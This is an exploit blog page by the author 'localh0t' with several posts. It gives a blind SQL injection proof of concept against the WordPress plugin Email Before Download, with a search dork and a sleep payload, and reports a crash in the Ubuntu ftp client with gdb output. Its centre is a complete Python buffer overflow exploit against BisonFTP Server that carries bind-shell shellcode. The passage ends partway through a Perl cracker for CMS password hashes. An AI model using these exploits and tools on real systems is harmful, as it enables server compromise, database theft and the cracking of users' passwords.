Exploit-ID » localh0t

WordPress Plugin Email Before Download

admin — Fri, 13 Apr 2012 10:29:16 +0000

# Wordpress Plugin: Email Before Download <=3.16 Remote Blind SQL Inyection
# Dork: allinurl: plugins/email-before-download
# Download: https://wordpress.org/extend/plugins/email-before-download/
# Date: 13/04/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
 
 
The variable $download_id is not properly sanitized with $wpdb->escape() before using it.
 
On line 120 (File: /email-before-download/email-before-download.php) we can see that:
=====================================================================================
 
	120: $ebd_item = $wpdb->get_row( "SELECT * FROM $table_item  WHERE download_id = '$download_id' " );
 
In the HTML generated, we can see that $download_id takes the $_POST value variable "_wpcf7_download_id" :
 
 	201: $hf .= '. $download_id. '" />';
 
PoC:
====
 
	POST http://website.com/?tag=some-post-with-contact-form
 
	Data:
	=====
	_wpcf7=135&_wpcf7_download_id=6 [SQL HERE]&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&your-email=email@sample.com&your-enterprise=1&your-name=test
 
		Example:
		========
		_wpcf7=135&_wpcf7_download_id=6 and sleep(10)&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&your-email=email@sample.com&your-enterprise=1&your-name=test
 
(POST variables names may vary)

Ubuntu

admin — Fri, 09 Sep 2011 04:07:57 +0000

^?View Code LINUX

Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:
 
Ubuntu 11.04 x86:
=================
 
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378     /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378     /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378     /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347     /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347     /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347     /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347     /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707    /usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707    /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707    /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0          [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098    /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098    /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
 
Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0xc8e    3214
edx            0x6    6
ebx            0xc8e    3214
esp            0xbfffdde4    0xbfffdde4
ebp            0xbfffddf0    0xbfffddf0
esi            0x0    0
edi            0x2f6ff4    3108852
eip            0x12e416    0x12e416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)
 
============================================================================================================================================================
 
Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================
 
Ubuntu 11.04 x64:
=================
 
$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461                             /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461                             /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461                             /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0                                  [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561                     /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
 
Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64    ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
    in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax            0x0    0
rbx            0x0    0
rcx            0xffffffffffffffff    -1
rdx            0x6    6
rsi            0x5dea    24042
rdi            0x5dea    24042
rbp            0x7fffffffcfd0    0x7fffffffcfd0
rsp            0x7fffffffc608    0x7fffffffc608
r8             0x7ffff770d8c0    140737344755904
r9             0x400660    4195936
r10            0x8    8
r11            0x246    582
r12            0x9    9
r13            0x3a    58
r14            0x3a    58
r15            0x5    5
rip            0x7ffff75f5d05    0x7ffff75f5d05 
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)
 
============================================================================================================================================================
 
Backtrack 5 R1:
===============
 
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580     /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580     /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580     /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0          [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180       /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180       /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180       /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757     /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313     /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200       /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200       /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267       /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267       /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267       /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123       /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123       /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123       /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
 
Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0x659    1625
edx            0x6    6
ebx            0x659    1625
esp            0xbfffdbfc    0xbfffdbfc
ebp            0xbfffdc08    0xbfffdc08
esi            0x0    0
edi            0xb7f5dff4    -1208623116
eip            0xb7fe2422    0xb7fe2422 <__kernel_vsyscall+2>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)
 
Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================
 
Slackware 12:
=============
 
root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long
 
ftp>

BisonFTP Server

admin — Wed, 10 Aug 2011 08:44:02 +0000

^?View Code WINDOWS

#!/usr/bin/python
# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
# Newer version's not tested, maybe vulnerable too
# written by localh0t
# Date: 10/08/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)
 
from socket import *
import sys, struct, os, time
 
if (len(sys.argv) < 3):
	print "\nBisonFTP Server <=v3.5 Remote Buffer Overflow Exploit"
        print "\n	Usage: %s   \n" %(sys.argv[0])
	sys.exit()
 
print "\n[!] Connecting to %s ..." %(sys.argv[1])
 
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
 
# padding
buffer = "\x90" * 1092
 
# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
 
# more padding
buffer += "\x90" * 8
 
# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
buffer += "\x9a\x5c\x3c\x7e"
 
# end connection
buffer += "\x0a"
 
# send buffer
print "[!] Sending exploit..."
sock.send(buffer)
sock.recv(1024)
sock.close()
print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
sys.exit()

Multi CMS Hash Cracker v0.1

admin — Sun, 24 Jul 2011 05:15:47 +0000

^?View Code PHP

#!usr/bin/perl
use Digest::MD5  qw(md5_hex);
use Digest::SHA1  qw(sha1_hex);
 
# Author: localh0t
# Date: 09/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch

# Help

if(!$ARGV[7])
	{
		 print "\n\n###########################################";
		 print "\n# Multi CMS Hash Cracker v0.1 by localh0t #";
         	 print "\n###########################################";
		 print "\n\nUse: perl $0 -d [WORLDLIST FOLDER] -h [MD5 | SHA-1 HASH] -s [SALT | USERNAME] -c [CMS]\n";
		 print "Example: perl $0 -d /home/localh0t/wordlists/ -h caef8544a8e65e23f67ab844d4866e8d -s uZ*qX -c IPB\n";
		 print "Example: perl $0 -d /home/localh0t/wordlists/ -h dc4a27b25e3f780b89c165f931d6f85d5bd6e33e -s Administrator -c SMF\n\n";
		 print "Note: Worlists must end with .txt or .lst (or any extension)\n\n";	
		 print "Support:\n========\n";
		 print "VB     : md5_hex(md5_hex(password).salt)           | (vBulletin)\n";
		 print "SMF    : sha1_hex(user.password)                   | (Simple Machines Forum)\n";
		 print "IPB    : md5_hex(md5_hex(salt).md5_hex(password))  | (Invision Power Board)\n";
		 print "JOOMLA : md5_hex(password.salt)                    | (Joomla 1.x)\n\n";
		 exit(0);
	}
 
 
# Functions

sub ipb_cracker{
	my $hash = shift;
	my $salt = shift;
	my $dir  = shift;
	foreach $file (@FILES) {
	open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n";
	print "[!] Using $file...\n";
			foreach $password(<DICT>) {
				$password=~s/\s|\n//;
				chomp($password);
				$cracked = md5_hex(md5_hex($salt).md5_hex($password));
				if ($cracked eq $hash) {
					return "[+] Hash cracked !: $password\n\n";
				}
			}
	print "[!] Nothing found with $file...\n\n";
	}
	return "\n[-] Password not found\n\n";
}
 
sub vb_cracker{
	my $hash = shift;
	my $salt = shift;
	my $dir  = shift;
	foreach $file (@FILES) {
	open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n";
	print "[!] Using $file...\n";
			foreach $password(<DICT>) {
				$password=~s/\s|\n//;
				chomp($password);
				$cracked = md5_hex(md5_hex($password).$salt);
				if ($cracked eq $hash) {
					return "[+] Hash cracked !: $password\n\n";
				}
			}
	print "[!] Nothing found with $file...\n\n";
	}
	return "\n[-] Password not found\n\n";
}
 
sub smf_cracker{
	my $hash = shift;
	my $user = shift;
	my $dir  = shift;
	foreach $file (@FILES) {
	open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n";
